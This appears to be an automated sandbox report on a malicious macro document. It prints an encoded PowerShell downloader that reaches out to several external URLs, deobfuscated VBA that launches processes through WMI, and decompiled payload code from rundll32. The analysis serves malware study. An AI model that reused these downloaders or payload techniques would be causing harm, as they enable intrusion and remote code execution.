UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAo
Zqvivtw592lxn
Array
huVBjtENv
Target
Split
sHhQm
hxzoFBtLC
Array
SbmMCGuEY
Target
Split
NvjyW
OwqxzJE
Array
dvuZzGDnA
Target
Split
VcboAE
ZJSnRBDm

Strings	Decrypted Strings
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"
"ns w""u db nd"
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"

Line	Instruction	Meta Information
159	Function Qbtcycloqlj79qjl(Uyflg5ryl7s4km2pbn)
160	Goto kWUSef	executed
161	Const WzIrJQJ as String = "A"
162	Const NYPQCHF as String = ","
163	Const TjMQdBBgE as String = "high,critic"
164	Dim gvcgAIUM as Range
164	Set gvcgAIUM = Array((WzIrJQJ), Target)	Array WzIrJQJ Target
165	If gvcgAIUM Is Nothing Then
166	Endif
167	Dim CNUcG() as String
167	CNUcG = Split(TjMQdBBgE, NYPQCHF)	Split TjMQdBBgE NYPQCHF
167	kWUSef:
169	Goto WiAHIOige
170	Const DObDSSSH as String = "A"
171	Const PCtZE as String = ","
172	Const PmuwJBJH as String = "high,critic"
173	Dim lrUBAA as Range
173	Set lrUBAA = Array((DObDSSSH), Target)	Array DObDSSSH Target
174	If lrUBAA Is Nothing Then
175	Endif
176	Dim MhDEGJ() as String
176	MhDEGJ = Split(PmuwJBJH, PCtZE)	Split PmuwJBJH PCtZE
176	WiAHIOige:
178	Goto PTpduh
179	Const dFuMF as String = "A"
180	Const IkIlHED as String = ","
181	Const ctRAim as String = "high,critic"
182	Dim PwyZCI as Range
182	Set PwyZCI = Array((dFuMF), Target)	Array dFuMF Target
183	If PwyZCI Is Nothing Then
184	Endif
185	Dim tWLOCW() as String
185	tWLOCW = Split(ctRAim, IkIlHED)	Split ctRAim IkIlHED
185	PTpduh:
187	Qbtcycloqlj79qjl = Replace(Uyflg5ryl7s4km2pbn, "ns w" + "u db nd", Zqvivtw592lxn)	Replace("wns wu db ndinns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db ndns wu db ndns wu db ndsns wu db ndns wu db ndns wu db nd:wns wu db ndns wu db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db ndns wu db ndpns wu db ndns wu db ndrons wu db ndns wu db ndcens wu db ndsns wu db ndsns wu db ndns wu db nd","ns wu db nd",) -> winmgmts:win32_process Zqvivtw592lxn executed
188	Goto NGzByr
189	Const huVBjtENv as String = "A"
190	Const hxzoFBtLC as String = ","
191	Const sHhQm as String = "high,critic"
192	Dim wdpnM as Range
192	Set wdpnM = Array((huVBjtENv), Target)	Array huVBjtENv Target
193	If wdpnM Is Nothing Then
194	Endif
195	Dim JtcSFJR() as String
195	JtcSFJR = Split(sHhQm, hxzoFBtLC)	Split sHhQm hxzoFBtLC
195	NGzByr:
197	Goto ArMYJEkJb
198	Const SbmMCGuEY as String = "A"
199	Const OwqxzJE as String = ","
200	Const NvjyW as String = "high,critic"
201	Dim cjdFFEGu as Range
201	Set cjdFFEGu = Array((SbmMCGuEY), Target)	Array SbmMCGuEY Target
202	If cjdFFEGu Is Nothing Then
203	Endif
204	Dim mnSyJHAv() as String
204	mnSyJHAv = Split(NvjyW, OwqxzJE)	Split NvjyW OwqxzJE
204	ArMYJEkJb:
206	Goto JvTSZI
207	Const dvuZzGDnA as String = "A"
208	Const ZJSnRBDm as String = ","
209	Const VcboAE as String = "high,critic"
210	Dim HKXrDBEI as Range
210	Set HKXrDBEI = Array((dvuZzGDnA), Target)	Array dvuZzGDnA Target
211	If HKXrDBEI Is Nothing Then
212	Endif
213	Dim OOobG() as String
213	OOobG = Split(VcboAE, ZJSnRBDm)	Split VcboAE ZJSnRBDm
213	JvTSZI:
215	End Function

Module: Zcf1kk3t2ssv4r07m

Declaration

Line	Content
1	Attribute VB_Name = "Zcf1kk3t2ssv4r07m"

Reset < >

Analysis Process: powershell.exe PID: 2544 Parent PID: 2400 powershell.exeCOMMON

Executed Functions

Function 000007FF00272F73, Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2098285602.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edbccbefecde3010aacd93e2aa38ac07ea02e5efe5a286b2242e2d1482a0629c
Instruction ID: 5af3e6fca45f9e3ae2387ef32b2be34ccf87728d822cf163085d6d9fb7505442
Opcode Fuzzy Hash: edbccbefecde3010aacd93e2aa38ac07ea02e5efe5a286b2242e2d1482a0629c
Instruction Fuzzy Hash: D841BE2051EBC64FE743973898696B17FF0EF07214B5A00E7D488CB0A3E9585E59C3A2

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF002708F3, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2098285602.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387dff4da2f1548f38a1e9b075e4d655f8d74ca447ceabd5abd0a300035f09ff
Instruction ID: 8fd10428fe08eb9cf9e4b21889503eea11e0247694206c50d209a67d69a9d102
Opcode Fuzzy Hash: 387dff4da2f1548f38a1e9b075e4d655f8d74ca447ceabd5abd0a300035f09ff
Instruction Fuzzy Hash: 7421EE6094E7C28FE793573858A52A57FB0AF57200B4A04E3D088CF1E3E95C9D9AC362

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF00272833, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2098285602.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec305e6ccab59b2a078ae79a672712856aec7d87f074bcafeca3f36518f8f1ad
Instruction ID: 45fc7e0433dc4486fd0555b3edafd8dc1ba9ceb2152b86ad035741724d58ca5f
Opcode Fuzzy Hash: ec305e6ccab59b2a078ae79a672712856aec7d87f074bcafeca3f36518f8f1ad
Instruction Fuzzy Hash: F401C02144E3C24FD303577858296A17FB0AF47214F4E02E7D4C9CF0B3E6595AA9C362

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2792 Parent PID: 2812 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	15.1%
Signature Coverage:	17.8%
Total number of Nodes:	73
Total number of Limit Nodes:	5

Executed Functions

Function 00207D7D, Relevance: 17.9, Strings: 14, Instructions: 374
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00207D7D() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _t406;
				signed short* _t408;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t441;
				signed int* _t470;
				signed int* _t471;
				signed short* _t477;
				signed int* _t478;

				_t478 =  &_v1720;
				_v1632 = 0x717f;
				_v1632 = _v1632 + 0xffff0b69;
				_v1632 = _v1632 + 0xffff4bbd;
				_v1632 = _v1632 ^ 0xfffec88c;
				_v1624 = 0x5b3d;
				_t425 = 0x4e;
				_v1624 = _v1624 / _t425;
				_v1624 = _v1624 + 0x3b40;
				_t423 = 0;
				_v1624 = _v1624 ^ 0x00006b1e;
				_t471 = 0x22ae8e06;
				_v1704 = 0xcbd5;
				_v1704 = _v1704 >> 6;
				_t426 = 0x17;
				_v1704 = _v1704 / _t426;
				_v1704 = _v1704 + 0x2ad9;
				_v1704 = _v1704 ^ 0x00003123;
				_v1580 = 0xdbf5;
				_t427 = 0x5c;
				_v1580 = _v1580 * 0x1b;
				_v1580 = _v1580 ^ 0x00173f74;
				_v1648 = 0x65d6;
				_v1648 = _v1648 + 0x84b1;
				_v1648 = _v1648 * 0x12;
				_v1648 = _v1648 ^ 0x00101fbb;
				_v1696 = 0x93ca;
				_v1696 = _v1696 * 0x14;
				_v1696 = _v1696 / _t427;
				_v1696 = _v1696 + 0xffff60cf;
				_v1696 = _v1696 ^ 0xffffe2d0;
				_v1568 = 0x4939;
				_v1568 = _v1568 + 0xaf0f;
				_v1568 = _v1568 ^ 0x0000d95a;
				_v1620 = 0x1fb;
				_v1620 = _v1620 | 0x860de658;
				_v1620 = _v1620 + 0xffff792b;
				_v1620 = _v1620 ^ 0x860d467d;
				_v1628 = 0x991f;
				_v1628 = _v1628 << 0xb;
				_v1628 = _v1628 + 0x8561;
				_v1628 = _v1628 ^ 0x04c95d8c;
				_v1688 = 0xc5a8;
				_t428 = 0xf;
				_v1688 = _v1688 * 0x46;
				_v1688 = _v1688 / _t428;
				_t429 = 0x21;
				_v1688 = _v1688 * 0x33;
				_v1688 = _v1688 ^ 0x00b7e901;
				_v1636 = 0x9981;
				_v1636 = _v1636 / _t429;
				_v1636 = _v1636 >> 8;
				_v1636 = _v1636 ^ 0x00005b8d;
				_v1672 = 0x4c1b;
				_v1672 = _v1672 << 3;
				_v1672 = _v1672 | 0xb8c6078b;
				_v1672 = _v1672 + 0xfffffa1e;
				_v1672 = _v1672 ^ 0xb8c64f7e;
				_v1680 = 0x7507;
				_v1680 = _v1680 ^ 0xfc87d912;
				_t430 = 0x57;
				_v1680 = _v1680 / _t430;
				_v1680 = _v1680 | 0x52ab30fe;
				_v1680 = _v1680 ^ 0x52ef22cb;
				_v1572 = 0xd7cd;
				_v1572 = _v1572 >> 1;
				_v1572 = _v1572 ^ 0x00004425;
				_v1612 = 0x327c;
				_t431 = 0x4a;
				_v1612 = _v1612 / _t431;
				_v1612 = _v1612 << 9;
				_v1612 = _v1612 ^ 0x000105f8;
				_v1684 = 0xeedb;
				_v1684 = _v1684 | 0xb4487ed8;
				_v1684 = _v1684 + 0xffffe615;
				_v1684 = _v1684 * 0x61;
				_v1684 = _v1684 ^ 0x4f9e85a0;
				_v1708 = 0xa411;
				_v1708 = _v1708 >> 0xb;
				_v1708 = _v1708 >> 0xc;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 ^ 0x00001027;
				_v1652 = 0x5fa;
				_v1652 = _v1652 * 0x15;
				_v1652 = _v1652 | 0x0889c09d;
				_v1652 = _v1652 ^ 0x0889d75f;
				_v1676 = 0xabed;
				_v1676 = _v1676 << 2;
				_v1676 = _v1676 + 0xffffe0e5;
				_v1676 = _v1676 ^ 0x9631fc90;
				_v1676 = _v1676 ^ 0x963327ba;
				_v1716 = 0x2f0;
				_v1716 = _v1716 >> 0xe;
				_v1716 = _v1716 >> 0xf;
				_v1716 = _v1716 >> 2;
				_v1716 = _v1716 ^ 0x00005632;
				_v1668 = 0xb719;
				_v1668 = _v1668 >> 0xf;
				_v1668 = _v1668 | 0x7bbc307b;
				_v1668 = _v1668 ^ 0x1874fdff;
				_v1668 = _v1668 ^ 0x63c8a7db;
				_v1700 = 0xf68;
				_v1700 = _v1700 * 0x3d;
				_v1700 = _v1700 * 0x5e;
				_v1700 = _v1700 ^ 0xc3b802d4;
				_v1700 = _v1700 ^ 0xc2e14722;
				_v1604 = 0xf526;
				_v1604 = _v1604 | 0xfb865dd6;
				_v1604 = _v1604 << 0x10;
				_v1604 = _v1604 ^ 0xfdf60e11;
				_v1692 = 0xe7a5;
				_v1692 = _v1692 >> 9;
				_v1692 = _v1692 * 0x69;
				_v1692 = _v1692 + 0xffffa091;
				_v1692 = _v1692 ^ 0xffffa346;
				_v1644 = 0xfb3a;
				_v1644 = _v1644 << 0xf;
				_v1644 = _v1644 | 0x145f0355;
				_v1644 = _v1644 ^ 0x7ddf4d76;
				_v1640 = 0x8cc2;
				_v1640 = _v1640 | 0xffda9e59;
				_v1640 = _v1640 ^ 0xffdaa737;
				_v1608 = 0x435c;
				_v1608 = _v1608 ^ 0x551376dd;
				_v1608 = _v1608 << 7;
				_v1608 = _v1608 ^ 0x899af7ad;
				_v1588 = 0xd652;
				_t432 = 0x1c;
				_v1588 = _v1588 / _t432;
				_v1588 = _v1588 ^ 0x000058ee;
				_v1720 = 0xa7dc;
				_v1720 = _v1720 ^ 0x05a38014;
				_t433 = 0x5b;
				_v1720 = _v1720 / _t433;
				_v1720 = _v1720 + 0xfffffd60;
				_v1720 = _v1720 ^ 0x000fa20d;
				_v1576 = 0xb9c2;
				_v1576 = _v1576 * 0x73;
				_v1576 = _v1576 ^ 0x0053500f;
				_v1596 = 0x70f2;
				_v1596 = _v1596 ^ 0x2104d0ae;
				_v1596 = _v1596 ^ 0x2104d823;
				_v1616 = 0x5963;
				_v1616 = _v1616 << 9;
				_v1616 = _v1616 ^ 0x4dab58e4;
				_v1616 = _v1616 ^ 0x4d19c9be;
				_v1564 = 0xedf5;
				_v1564 = _v1564 + 0xa5f4;
				_v1564 = _v1564 ^ 0x0001b6b3;
				_v1660 = 0x832e;
				_v1660 = _v1660 + 0xffff50b4;
				_v1660 = _v1660 >> 5;
				_v1660 = _v1660 ^ 0x07ffee80;
				_v1712 = 0x8701;
				_v1712 = _v1712 ^ 0x095342ef;
				_v1712 = _v1712 ^ 0x499570f7;
				_v1712 = _v1712 << 6;
				_v1712 = _v1712 ^ 0x31ad5d39;
				_v1664 = 0x5186;
				_v1664 = _v1664 * 0x48;
				_v1664 = _v1664 + 0xffff7e0d;
				_v1664 = _v1664 + 0xfc6;
				_v1664 = _v1664 ^ 0x00162065;
				_v1600 = 0x4362;
				_v1600 = _v1600 + 0xffff7a4f;
				_v1600 = _v1600 ^ 0xffff8bd1;
				_t477 = _v1600;
				_v1584 = 0x3cb6;
				_v1584 = _v1584 << 2;
				_v1584 = _v1584 ^ 0x0000d772;
				_v1656 = 0x7847;
				_v1656 = _v1656 * 0x76;
				_v1656 = _v1656 >> 7;
				_v1656 = _v1656 ^ 0x00002d73;
				_v1592 = 0x219b;
				_v1592 = _v1592 + 0x5ed0;
				_v1592 = _v1592 ^ 0x0000e1f1;
				while(_t471 != 0x5dac24b) {
					if(_t471 == 0x94e3c78) {
						_t408 = _t477;
						__eflags =  *_t477 - _t423;
						while(__eflags != 0) {
							__eflags =  *_t408 - 0x2c;
							if( *_t408 == 0x2c) {
								_t470 =  &_v1560;
								while(1) {
									_t408 =  &(_t408[1]);
									_t441 =  *_t408 & 0x0000ffff;
									__eflags = _t441;
									if(_t441 == 0) {
										break;
									}
									__eflags = _t441 - 0x20;
									if(_t441 != 0x20) {
										 *_t470 = _t441;
										_t470 =  &(_t470[0]);
										__eflags = _t470;
										continue;
									}
									break;
								}
								_t433 = 0;
								__eflags = 0;
								 *_t470 = 0;
							}
							_t408 =  &(_t408[1]);
							__eflags =  *_t408 - _t423;
						}
						_t471 = 0x5dac24b;
						continue;
					} else {
						if(_t471 == 0x1d31c645) {
							_t477 = E0020B8E7();
							_t471 = 0x94e3c78;
							continue;
						} else {
							if(_t471 == 0x1e27a3c8) {
								_push(_v1592);
								_push(_t423);
								_push(_t477);
								_push(_t433);
								_push(_v1656);
								_push(_v1584);
								_push(_t423);
								_push(_t423);
								E002089F6(_v1664, _v1600, __eflags);
								_t423 = 1;
								__eflags = 1;
							} else {
								if(_t471 == 0x22ae8e06) {
									E001F1CB3( &_v1560, _v1624, 0x208, _v1704);
									_pop(_t433);
									_t471 = 0x1d31c645;
									continue;
								} else {
									_t487 = _t471 - 0x2f70a4dc;
									if(_t471 != 0x2f70a4dc) {
										L20:
										__eflags = _t471 - 0xa4cd945;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_push(_t433);
										E001F1D54(_v1684, _t433, _v1708, _v1652, _v1676,  &_v520, _v1716, _v1632); // executed
										E001F8C0C(_v1668, _t487, _v1700, _v1604,  &_v1040);
										_push(0x1f12c0);
										_push(_v1640);
										E002063BF(E0020BF25(_v1692, _v1644, _t487), _t487, _v1588, _v1720, _t477, _v1692, _v1576,  &_v520,  &_v1040, _v1596);
										_t433 = _v1616;
										E0020C5F7(_t433, _v1564, _v1660, _v1712, _t418);
										_t478 =  &(_t478[0x18]);
										_t471 = 0x1e27a3c8;
										continue;
									}
								}
							}
						}
					}
					return _t423;
				}
				_push(0x1f1290);
				_push(_v1568);
				_t406 = E001FD867(E0020BF25(_v1648, _v1696, __eflags), _v1620,  &_v1560, _v1628, _v1688, _v1636); // executed
				asm("sbb edi, edi");
				_t433 = _v1672;
				_t471 = ( ~_t406 & 0x2523cb97) + 0xa4cd945;
				__eflags = _t471;
				E0020C5F7(_t433, _v1680, _v1572, _v1612, _t404);
				_t478 =  &(_t478[9]);
				goto L20;
			}

0x00207d7d
0x00207d83
0x00207d8d
0x00207d95
0x00207d9d
0x00207da5
0x00207db7
0x00207dbc
0x00207dc2
0x00207dca
0x00207dcc
0x00207dd4
0x00207dd9
0x00207de1
0x00207dea
0x00207def
0x00207df5
0x00207dfd
0x00207e05
0x00207e18
0x00207e1b
0x00207e22
0x00207e2d
0x00207e35
0x00207e42
0x00207e46
0x00207e4e
0x00207e5b
0x00207e67
0x00207e6b
0x00207e73
0x00207e7b
0x00207e86
0x00207e91
0x00207e9c
0x00207ea4
0x00207eac
0x00207eb4
0x00207ebc
0x00207ec4
0x00207ec9
0x00207ed1
0x00207ed9
0x00207ee6
0x00207ee9
0x00207ef5
0x00207efe
0x00207eff
0x00207f03
0x00207f0b
0x00207f19
0x00207f1d
0x00207f22
0x00207f2a
0x00207f34
0x00207f39
0x00207f41
0x00207f49
0x00207f51
0x00207f59
0x00207f67
0x00207f6c
0x00207f72
0x00207f7a
0x00207f82
0x00207f8d
0x00207f94
0x00207f9f
0x00207fb1
0x00207fb4
0x00207fb8
0x00207fbd
0x00207fc5
0x00207fcd
0x00207fd5
0x00207fe2
0x00207fe6
0x00207fee
0x00207ff6
0x00207ffb
0x00208000
0x00208005
0x0020800d
0x0020801a
0x0020801e
0x00208026
0x0020802e
0x00208036
0x0020803b
0x00208043
0x0020804b
0x00208053
0x0020805b
0x00208060
0x00208065
0x0020806a
0x00208072
0x0020807a
0x0020807f
0x00208087
0x0020808f
0x00208097
0x002080a4
0x002080ad
0x002080b1
0x002080b9
0x002080c1
0x002080cc
0x002080d7
0x002080df
0x002080ea
0x002080f2
0x002080fc
0x00208100
0x00208108
0x00208110
0x00208118
0x0020811d
0x00208125
0x0020812d
0x00208135
0x0020813d
0x00208147
0x00208152
0x0020815d
0x00208165
0x00208170
0x00208184
0x00208189
0x00208192
0x0020819d
0x002081a5
0x002081b1
0x002081b4
0x002081b8
0x002081c0
0x002081c8
0x002081db
0x002081e2
0x002081ed
0x002081f8
0x00208203
0x0020820e
0x00208216
0x0020821b
0x00208223
0x0020822b
0x00208236
0x00208241
0x0020824c
0x00208254
0x0020825c
0x00208261
0x00208269
0x00208271
0x00208279
0x00208281
0x00208286
0x0020828e
0x0020829b
0x0020829f
0x002082a7
0x002082af
0x002082b7
0x002082c2
0x002082cd
0x002082d8
0x002082df
0x002082ea
0x002082f2
0x002082fd
0x0020830a
0x0020830e
0x00208313
0x0020831b
0x00208326
0x00208331
0x0020833c
0x0020834e
0x00208487
0x00208489
0x0020848d
0x0020848f
0x00208493
0x00208495
0x002084aa
0x002084aa
0x002084ad
0x002084b0
0x002084b3
0x00000000
0x00000000
0x0020849e
0x002084a2
0x002084a4
0x002084a7
0x002084a7
0x00000000
0x002084a7
0x00000000
0x002084a2
0x002084b5
0x002084b5
0x002084b7
0x002084b7
0x002084ba
0x002084bd
0x002084bd
0x002084c2
0x00000000
0x00208354
0x0020835a
0x0020847b
0x0020847d
0x00000000
0x00208360
0x00208366
0x00208548
0x0020854f
0x00208550
0x00208551
0x00208552
0x00208556
0x00208568
0x00208569
0x0020856a
0x00208574
0x00208574
0x0020836c
0x00208372
0x0020845e
0x00208464
0x00208465
0x00000000
0x00208378
0x00208378
0x0020837e
0x0020853a
0x0020853a
0x00208540
0x00000000
0x00000000
0x00208546
0x00208384
0x00208384
0x002083a6
0x002083c2
0x002083c7
0x002083cc
0x0020841c
0x00208431
0x00208438
0x0020843d
0x00208440
0x00000000
0x00208440
0x0020837e
0x00208372
0x00208366
0x0020835a
0x00208581
0x00208581
0x002084cc
0x002084d1
0x00208504
0x00208515
0x00208528
0x0020852c
0x0020852c
0x00208532
0x00208537
0x00000000

Strings

9I, xrefs: 00207E7B
X, xrefs: 00208192
x<N, xrefs: 0020847D
=[, xrefs: 00207DA5
s-, xrefs: 00208313
#1, xrefs: 00207DFD
x<N, xrefs: 00208348
2V, xrefs: 0020806A
cY, xrefs: 0020820E
\C, xrefs: 00208147
BS, xrefs: 00208271
%D, xrefs: 00207F94
@;, xrefs: 00207DC2
bC, xrefs: 002082B7

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #1$%D$2V$9I$=[$@;$\C$bC$cY$s-$x<N$x<N$BS$X
API String ID: 0-3306313712
Opcode ID: 22ec8cc875ba0afb350bcde3cce682d77ec103f8ac51add44b86c86a8f5e7ec2
Instruction ID: f71e00b1aa55fd7abbae8349a9b33c8f86751424c824c91dc659e3e061f9cc06
Opcode Fuzzy Hash: 22ec8cc875ba0afb350bcde3cce682d77ec103f8ac51add44b86c86a8f5e7ec2
Instruction Fuzzy Hash: BA1222715093819FD3A8CF25C98AA4BBBF1BBC0748F508A1DF1D9862A0D7B58959CF03

Uniqueness

Uniqueness Score: -1.00%

